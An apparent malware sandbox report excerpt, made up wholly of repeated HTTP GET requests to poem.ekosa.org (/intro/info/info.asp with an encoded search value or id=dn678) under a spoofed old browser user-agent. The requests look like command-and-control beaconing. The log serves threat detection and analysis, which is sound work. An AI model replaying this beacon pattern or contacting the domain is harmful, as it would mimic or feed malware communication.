Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
